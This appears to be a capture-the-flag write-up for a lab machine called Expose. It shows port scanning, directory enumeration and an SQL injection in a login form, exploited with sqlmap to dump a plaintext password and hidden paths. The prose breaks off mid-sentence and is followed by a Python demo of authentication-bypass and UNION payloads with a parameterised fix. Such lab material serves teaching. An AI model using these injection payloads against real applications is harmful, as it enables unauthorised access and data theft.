# Expose Writeup

This is an easy machine that teaches you enumeration and patience.

## Enumeration

```sh
nmap -p- --min-rate 3000 10.10.45.72
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-03 14:25 CEST
Nmap scan report for 10.10.45.72
Host is up (0.064s latency).
Not shown: 65530 closed tcp ports (conn-refused)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
53/tcp   open  domain
1337/tcp open  waste
1883/tcp open  mqtt

Nmap done: 1 IP address (1 host up) scanned in 23.94 seconds
```

Port 1337 is only labelled `waste` from nmap's static port table (no `-sV` was run here); it actually hosts the web application we enumerate below.

### FTP

Anonymous login is accepted, but a quick look at the FTP content yields an empty directory and no interesting information.

```sh
$ ftp anonymous@10.10.144.33
Connected to 10.10.144.33
220 Welcome to the Expose Web Challenge.
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||30302|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        121          4096 Jun 11 11:56 .
drwxr-xr-x    2 0        121          4096 Jun 11 11:56 ..
226 Directory send OK.
ftp>
```

### MQTT

Looking at the messages published on the MQTT topics with [MQTT-Explorer](https://github.com/thomasnordquist/MQTT-Explorer/releases) shows a bunch of metrics data. I'll ignore this for now.

### Web

Next in line is web enumeration on port 1337. For this I'll use dirsearch, recursing into every directory it finds (up to five levels deep).
```sh
$ dirsearch -r -R 5 -u 10.10.144.33:1337

[00:43:20] Starting:
[00:43:23] 403 - 279B - /.ht_wsr.txt
[00:43:23] 403 - 279B - /.htaccess.bak1
[00:43:23] 403 - 279B - /.htaccess.sample
[00:43:23] 403 - 279B - /.htaccess.orig
[00:43:23] 403 - 279B - /.htaccess_orig
[00:43:23] 403 - 279B - /.htaccess.save
[00:43:23] 403 - 279B - /.htaccess_extra
[00:43:23] 403 - 279B - /.htaccess_sc
[00:43:23] 403 - 279B - /.htaccessOLD
[00:43:23] 403 - 279B - /.htaccessOLD2
[00:43:23] 403 - 279B - /.htaccessBAK
[00:43:23] 403 - 279B - /.html
[00:43:23] 403 - 279B - /.htm
[00:43:23] 403 - 279B - /.htpasswds
[00:43:23] 403 - 279B - /.htpasswd_test
[00:43:23] 403 - 279B - /.httr-oauth
[00:43:24] 403 - 279B - /.php
[00:43:32] 301 - 319B - /admin -> http://10.10.144.33:1337/admin/ (Added to queue)
[00:43:33] 403 - 279B - /admin/.htaccess
[00:43:33] 200 - 1KB - /admin/
[00:43:33] 200 - 1KB - /admin/?/login
[00:43:33] 200 - 1KB - /admin/index.php
[00:43:35] 301 - 323B - /admin_101 -> http://10.10.144.33:1337/admin_101/ (Added to queue)
[00:43:53] 200 - 91B - /index.php
[00:43:53] 200 - 91B - /index.php/login/ (Added to queue)
[00:43:54] 301 - 324B - /javascript -> http://10.10.144.33:1337/javascript/ (Added to queue)
[00:44:00] 200 - 15KB - /phpmyadmin/doc/html/index.html
[00:44:01] 301 - 324B - /phpmyadmin -> http://10.10.144.33:1337/phpmyadmin/
[00:44:02] 200 - 14KB - /phpmyadmin/
[00:44:02] 200 - 14KB - /phpmyadmin/index.php
[00:44:05] 403 - 279B - /server-status/ (Added to queue)
[00:44:05] 403 - 279B - /server-status

[00:44:14] Starting: admin/
[00:44:17] 403 - 279B - /admin/.ht_wsr.txt
[00:44:17] 403 - 279B - /admin/.htaccess.orig
[00:44:17] 403 - 279B - /admin/.htaccess.save
[00:44:17] 403 - 279B - /admin/.htm
[00:44:17] 403 - 279B - /admin/.html
[00:44:17] 403 - 279B - /admin/.htpasswd_test
[00:44:17] 403 - 279B - /admin/.htaccess_sc
[00:44:17] 403 - 279B - /admin/.htpasswds
[00:44:17] 403 - 279B - /admin/.htaccessOLD
[00:44:17] 403 - 279B - /admin/.htaccessBAK
[00:44:17] 403 - 279B - /admin/.htaccess_extra
[00:44:17] 403 - 279B - /admin/.htaccess_orig
[00:44:17] 403 - 279B - /admin/.htaccess.sample
[00:44:17] 403 - 279B - /admin/.htaccessOLD2
[00:44:17] 403 - 279B - /admin/.httr-oauth
[00:44:17] 403 - 279B - /admin/.htaccess.bak1
[00:44:18] 403 - 279B - /admin/.php
[00:44:35] 301 - 326B - /admin/assets -> http://10.10.144.33:1337/admin/assets/ (Added to queue)
[00:44:35] 200 - 2KB - /admin/assets/
[00:44:45] 200 - 1KB - /admin/index.php
[00:44:45] 200 - 1KB - /admin/index.php/login/ (Added to queue)
[00:44:48] 500 - 0B - /admin/logout.php
[00:44:50] 301 - 327B - /admin/modules -> http://10.10.144.33:1337/admin/modules/ (Added to queue)
[00:44:50] 200 - 1KB - /admin/modules/

[00:45:05] Starting: admin_101/
[00:45:08] 403 - 279B - /admin_101/.ht_wsr.txt
[00:45:08] 403 - 279B - /admin_101/.htaccess.bak1
[00:45:08] 403 - 279B - /admin_101/.htaccess.orig
[00:45:08] 403 - 279B - /admin_101/.htaccess.sample
[00:45:08] 403 - 279B - /admin_101/.htaccessOLD2
[00:45:08] 403 - 279B - /admin_101/.htaccess.save
[00:45:08] 403 - 279B - /admin_101/.htaccessBAK
[00:45:08] 403 - 279B - /admin_101/.htaccess_extra
[00:45:08] 403 - 279B - /admin_101/.htaccess_orig
[00:45:08] 403 - 279B - /admin_101/.htaccess_sc
[00:45:08] 403 - 279B - /admin_101/.html
[00:45:09] 403 - 279B - /admin_101/.htm
[00:45:09] 403 - 279B - /admin_101/.httr-oauth
[00:45:09] 403 - 279B - /admin_101/.htpasswds
[00:45:09] 403 - 279B - /admin_101/.htpasswd_test
[00:45:09] 403 - 279B - /admin_101/.htaccessOLD
[00:45:10] 403 - 279B - /admin_101/.php
[00:45:25] 200 - 2KB - /admin_101/assets/ (Added to queue)
[00:45:25] 301 - 330B - /admin_101/assets -> http://10.10.144.33:1337/admin_101/assets/
[00:45:28] 302 - 1KB - /admin_101/chat.php -> index
[00:45:36] 301 - 332B - /admin_101/includes -> http://10.10.144.33:1337/admin_101/includes/ (Added to queue)
[00:45:36] 200 - 1KB - /admin_101/includes/
[00:45:36] 200 - 2KB - /admin_101/index.php
[00:45:36] 200 - 2KB - /admin_101/index.php/login/ (Added to queue)
[00:45:39] 302 - 0B - /admin_101/logout.php -> login
[00:45:41] 200 - 1KB - /admin_101/modules/ (Added to queue)
[00:45:41] 301 - 331B - /admin_101/modules -> http://10.10.144.33:1337/admin_101/modules/
[00:45:49] 200 - 2KB - /admin_101/signup.php
[00:45:52] 301 - 328B - /admin_101/test -> http://10.10.144.33:1337/admin_101/test/ (Added to queue)
[00:45:52] 200 - 769B - /admin_101/test/

[00:46:04] Starting: index.php/login/

[00:46:56] Starting: javascript/
[00:46:59] 403 - 279B - /javascript/.htaccess.bak1
[00:46:59] 403 - 279B - /javascript/.ht_wsr.txt
[00:46:59] 403 - 279B - /javascript/.htaccess.orig
[00:46:59] 403 - 279B - /javascript/.htaccessOLD2
[00:46:59] 403 - 279B - /javascript/.htaccessBAK
[00:46:59] 403 - 279B - /javascript/.htaccess_sc
[00:46:59] 403 - 279B - /javascript/.htaccess_extra
[00:46:59] 403 - 279B - /javascript/.htaccess.save
[00:46:59] 403 - 279B - /javascript/.htaccess.sample
[00:46:59] 403 - 279B - /javascript/.htaccessOLD
[00:46:59] 403 - 279B - /javascript/.htaccess_orig
[00:46:59] 403 - 279B - /javascript/.htpasswd_test
[00:47:00] 403 - 279B - /javascript/.htpasswds
[00:47:00] 403 - 279B - /javascript/.htm
[00:47:00] 403 - 279B - /javascript/.httr-oauth
[00:47:00] 403 - 279B - /javascript/.html
[00:47:01] 403 - 279B - /javascript/.php

[00:47:48] Starting: server-status/
[00:47:50] 404 - 276B - /server-status/%2e%2e//google.com

[00:48:41] Starting: admin/assets/
[00:48:44] 403 - 279B - /admin/assets/.ht_wsr.txt
[00:48:44] 403 - 279B - /admin/assets/.htaccess.bak1
[00:48:44] 403 - 279B - /admin/assets/.htaccess.orig
[00:48:44] 403 - 279B - /admin/assets/.htaccess.save
[00:48:44] 403 - 279B - /admin/assets/.htaccess.sample
[00:48:44] 403 - 279B - /admin/assets/.htpasswds
[00:48:44] 403 - 279B - /admin/assets/.httr-oauth
[00:48:44] 403 - 279B - /admin/assets/.htaccessOLD
[00:48:44] 403 - 279B - /admin/assets/.htaccess_extra
[00:48:44] 403 - 279B - /admin/assets/.htaccess_orig
[00:48:44] 403 - 279B - /admin/assets/.htaccessOLD2
[00:48:44] 403 - 279B - /admin/assets/.htaccessBAK
[00:48:44] 403 - 279B - /admin/assets/.htaccess_sc
[00:48:44] 403 - 279B - /admin/assets/.html
[00:48:44] 403 - 279B - /admin/assets/.htm
[00:48:44] 403 - 279B - /admin/assets/.htpasswd_test
[00:48:46] 403 - 279B - /admin/assets/.php

[00:49:36] Starting: admin/index.php/login/

[00:50:34] Starting: admin/modules/
[00:50:38] 403 - 279B - /admin/modules/.htaccess.bak1
[00:50:38] 403 - 279B - /admin/modules/.ht_wsr.txt
[00:50:38] 403 - 279B - /admin/modules/.htaccess.sample
[00:50:38] 403 - 279B - /admin/modules/.htaccess_extra
[00:50:38] 403 - 279B - /admin/modules/.htaccess.orig
[00:50:38] 403 - 279B - /admin/modules/.htaccess_sc
[00:50:38] 403 - 279B - /admin/modules/.htaccessBAK
[00:50:38] 403 - 279B - /admin/modules/.htaccess.save
[00:50:38] 403 - 279B - /admin/modules/.htaccessOLD2
[00:50:38] 403 - 279B - /admin/modules/.htaccess_orig
[00:50:38] 403 - 279B - /admin/modules/.htm
[00:50:38] 403 - 279B - /admin/modules/.htaccessOLD
[00:50:38] 403 - 279B - /admin/modules/.httr-oauth
[00:50:38] 403 - 279B - /admin/modules/.htpasswd_test
[00:50:38] 403 - 279B - /admin/modules/.htpasswds
[00:50:38] 403 - 279B - /admin/modules/.html
[00:50:39] 403 - 279B - /admin/modules/.php
[00:51:04] 200 - 16B - /admin/modules/footer.php
[00:51:05] 200 - 628B - /admin/modules/header.php

[00:51:29] Starting: admin_101/assets/
[00:51:33] 403 - 279B - /admin_101/assets/.htaccess.orig
[00:51:33] 403 - 279B - /admin_101/assets/.ht_wsr.txt
[00:51:33] 403 - 279B - /admin_101/assets/.htaccess.sample
[00:51:33] 403 - 279B - /admin_101/assets/.htaccess.save
[00:51:33] 403 - 279B - /admin_101/assets/.htaccess_orig
[00:51:33] 403 - 279B - /admin_101/assets/.htaccessOLD2
[00:51:33] 403 - 279B - /admin_101/assets/.htaccessBAK
[00:51:33] 403 - 279B - /admin_101/assets/.html
[00:51:33] 403 - 279B - /admin_101/assets/.htaccess_sc
[00:51:33] 403 - 279B - /admin_101/assets/.htaccessOLD
[00:51:33] 403 - 279B - /admin_101/assets/.htm
[00:51:33] 403 - 279B - /admin_101/assets/.htaccess.bak1
[00:51:33] 403 - 279B - /admin_101/assets/.httr-oauth
[00:51:33] 403 - 279B - /admin_101/assets/.htpasswds
[00:51:33] 403 - 279B - /admin_101/assets/.htpasswd_test
[00:51:33] 403 - 279B - /admin_101/assets/.htaccess_extra
[00:51:34] 403 - 279B - /admin_101/assets/.php

[00:52:23] Starting: admin_101/includes/
[00:52:27] 403 - 279B - /admin_101/includes/.htaccess.orig
[00:52:27] 403 - 279B - /admin_101/includes/.htaccess.bak1
[00:52:27] 403 - 279B - /admin_101/includes/.htaccess.sample
[00:52:27] 403 - 279B - /admin_101/includes/.htaccess.save
[00:52:27] 403 - 279B - /admin_101/includes/.htaccessBAK
[00:52:27] 403 - 279B - /admin_101/includes/.ht_wsr.txt
[00:52:27] 403 - 279B - /admin_101/includes/.htaccess_orig
[00:52:27] 403 - 279B - /admin_101/includes/.htm
[00:52:27] 403 - 279B - /admin_101/includes/.htpasswd_test
[00:52:27] 403 - 279B - /admin_101/includes/.htaccessOLD2
[00:52:27] 403 - 279B - /admin_101/includes/.htaccess_sc
[00:52:27] 403 - 279B - /admin_101/includes/.htaccess_extra
[00:52:27] 403 - 279B - /admin_101/includes/.htaccessOLD
[00:52:27] 403 - 279B - /admin_101/includes/.htpasswds
[00:52:27] 403 - 279B - /admin_101/includes/.httr-oauth
[00:52:27] 403 - 279B - /admin_101/includes/.html
[00:52:29] 403 - 279B - /admin_101/includes/.php

[00:53:18] Starting: admin_101/index.php/login/

[00:54:19] Starting: admin_101/modules/
[00:54:23] 403 - 279B - /admin_101/modules/.ht_wsr.txt
[00:54:23] 403 - 279B - /admin_101/modules/.htaccess.bak1
[00:54:23] 403 - 279B - /admin_101/modules/.htaccess.orig
[00:54:23] 403 - 279B - /admin_101/modules/.htaccess.sample
[00:54:23] 403 - 279B - /admin_101/modules/.htaccess_extra
[00:54:23] 403 - 279B - /admin_101/modules/.htaccess_orig
[00:54:23] 403 - 279B - /admin_101/modules/.htaccess.save
[00:54:23] 403 - 279B - /admin_101/modules/.htaccessOLD2
[00:54:23] 403 - 279B - /admin_101/modules/.htaccessBAK
[00:54:23] 403 - 279B - /admin_101/modules/.html
[00:54:23] 403 - 279B - /admin_101/modules/.htpasswd_test
[00:54:23] 403 - 279B - /admin_101/modules/.htaccess_sc
[00:54:23] 403 - 279B - /admin_101/modules/.htaccessOLD
[00:54:23] 403 - 279B - /admin_101/modules/.htm
[00:54:23] 403 - 279B - /admin_101/modules/.htpasswds
[00:54:23] 403 - 279B - /admin_101/modules/.httr-oauth
[00:54:24] 403 - 279B - /admin_101/modules/.php
[00:54:49] 200 - 16B - /admin_101/modules/footer.php
[00:54:50] 500 - 0B - /admin_101/modules/header.php

[00:55:13] Starting: admin_101/test/
[00:55:17] 403 - 279B - /admin_101/test/.ht_wsr.txt
[00:55:17] 403 - 279B - /admin_101/test/.htaccess.orig
[00:55:17] 403 - 279B - /admin_101/test/.htaccess.bak1
[00:55:17] 403 - 279B - /admin_101/test/.htaccess_extra
[00:55:17] 403 - 279B - /admin_101/test/.htaccess.save
[00:55:17] 403 - 279B - /admin_101/test/.htaccess.sample
[00:55:17] 403 - 279B - /admin_101/test/.htaccess_sc
[00:55:17] 403 - 279B - /admin_101/test/.htaccess_orig
[00:55:17] 403 - 279B - /admin_101/test/.htaccessOLD
[00:55:17] 403 - 279B - /admin_101/test/.htaccessBAK
[00:55:17] 403 - 279B - /admin_101/test/.htaccessOLD2
[00:55:17] 403 - 279B - /admin_101/test/.htpasswd_test
[00:55:17] 403 - 279B - /admin_101/test/.htm
[00:55:17] 403 - 279B - /admin_101/test/.html
[00:55:17] 403 - 279B - /admin_101/test/.htpasswds
[00:55:17] 403 - 279B - /admin_101/test/.httr-oauth
[00:55:18] 403 - 279B - /admin_101/test/.php
```

We can see two different administrative URL paths, `/admin` and `/admin_101`, plus a phpMyAdmin instance. Visiting `admin_101` presents a login form with a username already prefilled. Catching the response to a failed login attempt in Burp Suite shows that the application echoes its SQL query back in the JSON error message. Since the submitted e-mail address is pasted verbatim between the quotes of that query, there is very likely an SQL injection through the username/email parameter of the form.
```json
{
  "status": "error",
  "messages": [
    "SELECT * FROM user WHERE email = 'hacker@root.thm'"
  ]
}
```

Running sqlmap against the login POST request (captured in Burp Suite and saved to a file) confirms the injection and dumps both the credentials and some hidden paths stored in the database.

```sh
sqlmap -r ./login.req --dump
```

```
[...]
Database: expose
Table: config
[2 entries]
+----+------------------------------+-----------------------------------------------------+
| id | url                          | password                                            |
+----+------------------------------+-----------------------------------------------------+
| 1  | /file1010111/index.php       | 69c66901194a6486176e81f5945b8929                    |
| 3  | /upload-cv00101011/index.php | // ONLY ACCESSIBLE THROUGH USERNAME STARTING WITH Z |
+----+------------------------------+-----------------------------------------------------+

[22:53:58] [INFO] table 'expose.config' dumped to CSV file '/home/kali/.local/share/sqlmap/output/10.10.144.33/dump/expose/config.csv'
[22:53:58] [INFO] fetching columns for table 'user' in database 'expose'
[22:53:58] [INFO] retrieved: 'id'
[22:53:58] [INFO] retrieved: 'int'
[22:53:58] [INFO] retrieved: 'email'
[22:53:58] [INFO] retrieved: 'varchar(512)'
[22:53:58] [INFO] retrieved: 'password'
[22:53:59] [INFO] retrieved: 'varchar(512)'
[22:53:59] [INFO] retrieved: 'created'
[22:53:59] [INFO] retrieved: 'timestamp'
[22:53:59] [INFO] fetching entries for table 'user' in database 'expose'
[22:53:59] [INFO] retrieved: '2023-02-21 09:05:46'
[22:53:59] [INFO] retrieved: 'hacker@root.thm'
[22:53:59] [INFO] retrieved: '1'
[22:53:59] [INFO] retrieved: 'VeryDifficultPassword!!#@#@!#!@#1231'
Database: expose
Table: user
[1 entry]
+----+-----------------+---------------------+--------------------------------------+
| id | email           | created             | password                             |
+----+-----------------+---------------------+--------------------------------------+
| 1  | hacker@root.thm | 2023-02-21 09:05:46 | VeryDifficultPassword!!#@#@!#!@#1231 |
+----+-----------------+---------------------+--------------------------------------+
[...]
```

Note that the `user` password is stored in plaintext, while the `config` entry for `/file1010111/index.php` (id 1) holds a 32-character hex string, i.e. an unsalted hash. [Crackstation](https://crackstation.net) is able to solve that hash in no time. After
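To make the injection that sqlmap automated above concrete, here is an added example (my own code, not part of the original writeup or of the challenge's source). It rebuilds the two tables from the dump in an in-memory SQLite database (the real backend is presumably MySQL, given the phpMyAdmin instance; the `-- ` comment syntax used in the payloads works in both), constructs the login query exactly the way the leaked error message suggests, and shows the two things an attacker gets from it: an authentication bypass and a UNION read of the `config` table. The function names, the payload strings and the SQLite schema are my assumptions; the row contents are copied from the sqlmap output.

```python
"""Model of the admin_101 login query from the Expose writeup (added example).

Demonstrates why `SELECT * FROM user WHERE email = '<input>'` built by string
concatenation is injectable, and what the parameterised fix looks like.
"""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the `expose` database; rows copied from the sqlmap dump."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE user   (id INTEGER, email TEXT, password TEXT, created TEXT);
        CREATE TABLE config (id INTEGER, url TEXT, password TEXT);
        INSERT INTO user VALUES
          (1, 'hacker@root.thm', 'VeryDifficultPassword!!#@#@!#!@#1231', '2023-02-21 09:05:46');
        INSERT INTO config VALUES
          (1, '/file1010111/index.php',       '69c66901194a6486176e81f5945b8929'),
          (3, '/upload-cv00101011/index.php', '// ONLY ACCESSIBLE THROUGH USERNAME STARTING WITH Z');
        """
    )
    return db


def lookup_vulnerable(db: sqlite3.Connection, email: str) -> list:
    """Query built the way the leaked JSON error suggests: the e-mail is pasted
    into the SQL text, so a quote in the input ends the string literal and the
    rest of the input is parsed as SQL."""
    sql = f"SELECT * FROM user WHERE email = '{email}'"
    return db.execute(sql).fetchall()


def lookup_safe(db: sqlite3.Connection, email: str) -> list:
    """Same lookup with a bound parameter: the value travels separately from the
    statement and is never parsed as SQL, whatever characters it contains."""
    return db.execute("SELECT * FROM user WHERE email = ?", (email,)).fetchall()


# Payload 1 (assumed): close the literal, make the WHERE clause always true,
# and comment out the original closing quote.
BYPASS = "' OR 1=1 -- "

# Payload 2 (assumed): UNION the login query with the config table. `user` has
# four columns, so the injected SELECT must also yield four (NULL pads the last).
UNION_DUMP = "' UNION SELECT id, url, password, NULL FROM config -- "


def leak_config(db: sqlite3.Connection) -> list:
    """What sqlmap did for us above: pull config.url/config.password through the
    login query. Returns sorted (url, password) pairs; rows whose `created`
    column is NULL can only have come from the UNIONed config table."""
    rows = lookup_vulnerable(db, UNION_DUMP)
    return sorted((r[1], r[2]) for r in rows if r[3] is None)


if __name__ == "__main__":
    db = build_db()
    print("bypass rows  :", lookup_vulnerable(db, BYPASS))
    print("safe lookup  :", lookup_safe(db, BYPASS))
    for url, secret in leak_config(db):
        print(f"leaked       : {url} -> {secret}")
```

Running the file prints the single `user` row for the bypass payload, an empty list for the same payload through the parameterised query, and the two `config` rows. The fix is not input filtering but the bound parameter in `lookup_safe`; on the real target the same change would also stop the application from ever building the query string it leaks in its error response.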